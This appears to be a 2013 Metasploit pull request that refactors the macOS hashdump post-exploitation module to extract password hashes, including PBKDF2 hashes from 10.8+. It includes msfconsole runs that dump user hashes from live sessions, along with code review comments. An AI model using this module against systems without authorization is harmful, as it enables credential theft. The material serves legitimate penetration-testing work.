Refactor OSX hashdump post module and add support for 10.8+ hashes #2735

Merged
merged 8 commits into from Dec 10, 2013

jvennix-r7
Contributor

  • Adds support for MATCHUSER datastore regexp
  • Adds support for OSX 10.8 and 10.9 hashes (PBKDF2)
  • DRYs up a bunch of older code, adds lots of helper fns

Note that the enum_osx post module duplicates the functionality for hashdump. I am purposefully not updating the duplicate, as this is a bad pattern, and I am in the middle of refactoring enum_osx anyways (branch name refactor_osx_enum).

Verification steps:

  • Module successfully dumps hashes on an OSX session on 10.6 or below
  • Module successfully dumps hashes on an OSX session on 10.7
  • Module successfully dumps hashes on an OSX session on 10.8 or 10.9
  • Ensure that the MATCHUSERS datastore option works as expected

In each instance, verify that the dumped hash is identical to what Dave Grohl outputs with this command:

./dave --john=<username>

* Adds support for MATCHUSER regex option
* Adds support for OSX 10.8 and 10.9 hashes (PBKDF2)
* DRYs up a bunch of older code, adds lots of helper fns
* Ends up shaving off ~20 lines
* Also add spacing and indentation for better readability.
* Refactors grab_shadow_blob method.
@jvazquez-r7
Contributor

Processing...

@jvazquez-r7
Contributor

Tested successfully on Mavericks:

msf exploit(handler) > use post/osx/gather/hashdump 
msf post(hashdump) > set session 2
session => 2
msf post(hashdump) > run

[*] Attempting to grab shadow for user juan...
[+] SHA512:....blahblahblah
[+] Unshadowed Password File: /Users/juan/.msf4/loot/20131209080431_default_192.168.172.1_osx.hashes.sha51_.txt
[*] Post module execution completed

@jvennix-r7 were you able to test on 10.6 / 10.7? I don't have 10.6/10.7 available to test. So if you did and could provide output, that will be enough for me to land :)


# Check if NT HASH is present
if hash_decoded =~ /4F1010/
report_nt_hash(hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)[0][0])
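
Review bot: the guard `hash_decoded =~ /4F1010/` only checks for the start marker, while the `scan` on the following line also requires a trailing `4F1044`, so input that contains the first marker but not the second makes `scan` return an empty array and `[0][0]` raises NoMethodError on nil. Run the full pattern once, keep the match, and call `report_nt_hash` only when the capture is present, for example `if (m = hash_decoded.match(/^\w*4F1010(\w*)4F1044/))` and then pass `m[1]`. Note also that both patterns match at any offset in the hex string, including odd nibble positions, so a check that the capture has the expected length would make the extraction safer.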
Contributor

I miss a second argument for report_nt_hash

@jvennix-r7
Contributor Author

@jvazquez-r7 sure I'll test on those later today

@jvennix-r7
Contributor Author

@kgray-r7 is going to verify 10.6 and 10.8, I'll re-verify 10.7 later

@jvennix-r7
Contributor Author

Found a bug in 10.5/6, fixed and verified working:

msf exploit(handler) > sessions -i 1 -c 'uname -a'
Darwin Mac-Pro.local 9.4.0 Darwin Kernel Version 9.4.0: Fri Aug  1 21:34:49 EST 2008; ToH & StageXNU:xnu-1228.5.20/BUILD/obj/RELEASE_I386 i386
msf exploit(handler) > use post/osx/gather/hashdump
msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > run
[*] Running module against Mac-Pro.local
[*] This session is running as root!
[*] Dumping Hashes
[*] SHA1:Admin:<sha hash for pass1234>
[+] Unshadowed Password File: /Users/joe/.msf4/loot/20131209192430_default_192.168.0.5_osx.hashes.sha1_614263.txt
[*] Post module execution completed

@jvennix-r7
Contributor Author

Working well in 10.7:

msf post(hashdump) > sessions -i 2 -c 'uname -a'
Darwin joes-Mac.local 11.0.0 Darwin Kernel Version 11.0.0: Sat Jun 18 12:56:35 PDT 2011; root:xnu-1699.22.73~1/RELEASE_X86_64 x86_64
msf post(hashdump) > set session 2
session => 2
msf post(hashdump) > run
[*] Attempting to grab shadow for user joe...
[*] SHA512:joe:....my sha512 hash....
[+] Unshadowed Password File: /Users/joe/.msf4/loot/20131209193243_default_192.168.0.5_osx.hashes.sha51_049038.txt
[*] Post module execution completed

@jvazquez-r7
Contributor

Thanks @jvennix-r7 and @kgray-r7, proceeding with landing!

@jvazquez-r7 merged commit 06b651d into rapid7:master Dec 10, 2013